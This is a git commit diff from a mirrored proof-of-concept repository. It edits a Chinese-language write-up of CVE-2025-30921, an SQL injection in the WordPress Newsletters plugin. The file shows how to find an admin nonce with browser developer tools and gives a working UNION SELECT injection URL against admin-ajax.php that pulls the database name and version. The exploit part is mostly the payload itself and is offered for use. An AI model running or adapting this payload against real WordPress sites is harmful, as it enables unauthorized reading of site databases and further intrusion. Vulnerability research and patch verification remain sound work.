mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-06-20 09:51:11 +00:00
Update WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
This commit is contained in:
parent
30cd11c2e4
commit
ab967c7b6b
@ -8,13 +8,14 @@ WordPress在Newsletters插件版本4.9.9.7或更低版本的插件仪表板中
|
|||||||
body="/wp-content/plugins/web-directory-free"
|
body="/wp-content/plugins/web-directory-free"
|
||||||
```
|
```
|
||||||
|
|
||||||
## poc-(需要Administrator权限)
|
## 前提条件和Administrator权限
|
||||||
使用浏览器开发者工具,action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如,如果搜索结果如下所示,请记下22b1ac0de6
|
使用浏览器开发者工具,action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如,如果搜索结果如下所示,请记下22b1ac0de6
|
||||||
```
|
```
|
||||||
jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
|
jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
|
||||||
```
|
```
|
||||||

|

|
||||||
|
|
||||||
|
## poc
|
||||||
```javascript
|
```javascript
|
||||||
http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
|
http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
|
||||||
```
|
```
|
||||||
|
Loading…
x
Reference in New Issue
Block a user